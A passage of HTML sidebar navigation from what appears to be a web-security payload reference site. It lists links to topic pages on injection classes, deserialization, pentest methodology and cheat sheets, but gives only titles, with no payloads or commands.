<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Headless Browser
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Headless Browser
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Headless%20Browser/" class="md-nav__link">
<span class="md-ellipsis">
Headless Browser
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_26" >
<label class="md-nav__link" for="__nav_26" id="__nav_26_label" tabindex="0">
<span class="md-ellipsis">
Insecure Deserialization
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_26_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_26">
<span class="md-nav__icon md-icon"></span>
Insecure Deserialization
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/DotNET/" class="md-nav__link">
<span class="md-ellipsis">
.NET Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Java/" class="md-nav__link">
<span class="md-ellipsis">
Java Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Node/" class="md-nav__link">
<span class="md-ellipsis">
Node Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/PHP/" class="md-nav__link">
<span class="md-ellipsis">
PHP Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Python/" class="md-nav__link">
<span class="md-ellipsis">
Python Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Ruby Deserialization
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_27" >
<label class="md-nav__link" for="__nav_27" id="__nav_27_label" tabindex="0">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_27_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_27">
<span class="md-nav__icon md-icon"></span>
Insecure Direct Object References
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Direct%20Object%20References/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_28" >
<label class="md-nav__link" for="__nav_28" id="__nav_28_label" tabindex="0">
<span class="md-ellipsis">
Insecure Management Interface
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_28_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_28">
<span class="md-nav__icon md-icon"></span>
Insecure Management Interface
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Management%20Interface/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Management Interface
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_29" >
<label class="md-nav__link" for="__nav_29" id="__nav_29_label" tabindex="0">
<span class="md-ellipsis">
Insecure Randomness
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_29_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_29">
<span class="md-nav__icon md-icon"></span>
Insecure Randomness
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Randomness/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Randomness
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_30" >
<label class="md-nav__link" for="__nav_30" id="__nav_30_label" tabindex="0">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_30_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_30">
<span class="md-nav__icon md-icon"></span>
Insecure Source Code Management
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Bazaar/" class="md-nav__link">
<span class="md-ellipsis">
Bazaar
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Git/" class="md-nav__link">
<span class="md-ellipsis">
Git
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Mercurial/" class="md-nav__link">
<span class="md-ellipsis">
Mercurial
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Subversion/" class="md-nav__link">
<span class="md-ellipsis">
Subversion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_31" >
<label class="md-nav__link" for="__nav_31" id="__nav_31_label" tabindex="0">
<span class="md-ellipsis">
JSON Web Token
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_31_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_31">
<span class="md-nav__icon md-icon"></span>
JSON Web Token
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../JSON%20Web%20Token/" class="md-nav__link">
<span class="md-ellipsis">
JWT - JSON Web Token
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_32" >
<label class="md-nav__link" for="__nav_32" id="__nav_32_label" tabindex="0">
<span class="md-ellipsis">
Java RMI
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_32_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_32">
<span class="md-nav__icon md-icon"></span>
Java RMI
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Java%20RMI/" class="md-nav__link">
<span class="md-ellipsis">
Java RMI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_33" >
<label class="md-nav__link" for="__nav_33" id="__nav_33_label" tabindex="0">
<span class="md-ellipsis">
LDAP Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_33_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_33">
<span class="md-nav__icon md-icon"></span>
LDAP Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LDAP%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LDAP Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_34" >
<label class="md-nav__link" for="__nav_34" id="__nav_34_label" tabindex="0">
<span class="md-ellipsis">
LaTeX Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_34_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_34">
<span class="md-nav__icon md-icon"></span>
LaTeX Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LaTeX%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LaTeX Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_35" >
<label class="md-nav__link" for="__nav_35" id="__nav_35_label" tabindex="0">
<span class="md-ellipsis">
Mass Assignment
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_35_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_35">
<span class="md-nav__icon md-icon"></span>
Mass Assignment
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Mass%20Assignment/" class="md-nav__link">
<span class="md-ellipsis">
Mass Assignment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_36" >
<label class="md-nav__link" for="__nav_36" id="__nav_36_label" tabindex="0">
<span class="md-ellipsis">
Methodology and Resources
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_36_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_36">
<span class="md-nav__icon md-icon"></span>
Methodology and Resources
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Active%20Directory%20Attack/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - Azure
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Docker%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Kubernetes%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Kubernetes
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Escape%20Breakout/" class="md-nav__link">
<span class="md-ellipsis">
Application Escape and Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/HTML%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Hash%20Cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Initial%20Access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/MSSQL%20Server%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Server
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Methodology%20and%20enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology and Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Pivoting%20Techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Office%20-%20Attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Powershell%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management &amp; CI/CD Compromise
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Vulnerability%20Reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Web%20Attack%20Surface/" class="md-nav__link">
<span class="md-ellipsis">
Subdomains Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20DPAPI/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Mimikatz/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Using%20credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_37" >
<label class="md-nav__link" for="__nav_37" id="__nav_37_label" tabindex="0">
<span class="md-ellipsis">
NoSQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_37_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_37">
<span class="md-nav__icon md-icon"></span>
NoSQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../NoSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
NoSQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_38" >
<label class="md-nav__link" for="__nav_38" id="__nav_38_label" tabindex="0">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_38_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_38">
<span class="md-nav__icon md-icon"></span>
OAuth Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../OAuth%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_39" >
<label class="md-nav__link" for="__nav_39" id="__nav_39_label" tabindex="0">
<span class="md-ellipsis">
ORM Leak
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_39_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_39">
<span class="md-nav__icon md-icon"></span>
ORM Leak
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../ORM%20Leak/" class="md-nav__link">
<span class="md-ellipsis">
ORM Leak
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_40" >
<label class="md-nav__link" for="__nav_40" id="__nav_40_label" tabindex="0">
<span class="md-ellipsis">
Open Redirect
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_40_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_40">
<span class="md-nav__icon md-icon"></span>
Open Redirect
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Open%20Redirect/" class="md-nav__link">
<span class="md-ellipsis">
Open URL Redirect
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_41" >
<label class="md-nav__link" for="__nav_41" id="__nav_41_label" tabindex="0">
<span class="md-ellipsis">
Prompt Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_41_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_41">
<span class="md-nav__icon md-icon"></span>
Prompt Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prompt%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Prompt Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_42" >
<label class="md-nav__link" for="__nav_42" id="__nav_42_label" tabindex="0">
<span class="md-ellipsis">
Prototype Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_42_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_42">
<span class="md-nav__icon md-icon"></span>
Prototype Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prototype%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
Prototype Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_43" >
<label class="md-nav__link" for="__nav_43" id="__nav_43_label" tabindex="0">
<span class="md-ellipsis">
Race Condition
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_43_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_43">
<span class="md-nav__icon md-icon"></span>
Race Condition
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Race%20Condition/" class="md-nav__link">
<span class="md-ellipsis">
Race Condition
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_44" >
<label class="md-nav__link" for="__nav_44" id="__nav_44_label" tabindex="0">
<span class="md-ellipsis">
Regular Expression
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_44">
<span class="md-nav__icon md-icon"></span>
Regular Expression
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Regular%20Expression/" class="md-nav__link">
<span class="md-ellipsis">
Regular Expression
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_45" >
<label class="md-nav__link" for="__nav_45" id="__nav_45_label" tabindex="0">
<span class="md-ellipsis">
Request Smuggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_45_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_45">
<span class="md-nav__icon md-icon"></span>
Request Smuggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Request%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
Request Smuggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_46" >
<label class="md-nav__link" for="__nav_46" id="__nav_46_label" tabindex="0">
<span class="md-ellipsis">
SAML Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_46_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_46">
<span class="md-nav__icon md-icon"></span>
SAML Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SAML%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SAML Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_47" >
<label class="md-nav__link" for="__nav_47" id="__nav_47_label" tabindex="0">
<span class="md-ellipsis">
SQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_47_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_47">
<span class="md-nav__icon md-icon"></span>
SQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/BigQuery%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Google BigQuery SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/Cassandra%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cassandra Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/DB2%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
DB2 Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MSSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MySQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MySQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/OracleSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Oracle SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/PostgreSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
PostgreSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/SQLite%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQLite Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/SQLmap/" class="md-nav__link">
<span class="md-ellipsis">
SQLmap
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_48" >
<label class="md-nav__link" for="__nav_48" id="__nav_48_label" tabindex="0">
<span class="md-ellipsis">
Server Side Include Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_48_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_48">
<span class="md-nav__icon md-icon"></span>
Server Side Include Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Include%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Include Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_49" >
<label class="md-nav__link" for="__nav_49" id="__nav_49_label" tabindex="0">
<span class="md-ellipsis">
Server Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_49_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_49">
<span class="md-nav__icon md-icon"></span>
Server Side Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Request%20Forgery/SSRF-Advanced-Exploitation/" class="md-nav__link">
<span class="md-ellipsis">
SSRF Advanced Exploitation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances/" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Cloud Instances
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_50" >
<label class="md-nav__link" for="__nav_50" id="__nav_50_label" tabindex="0">
<span class="md-ellipsis">
Server Side Template Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_50_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_50">
<span class="md-nav__icon md-icon"></span>
Server Side Template Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/ASP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - ASP.NET
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/Java/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Java
</span>
</a>
</li>
<li class="md-nav__item">
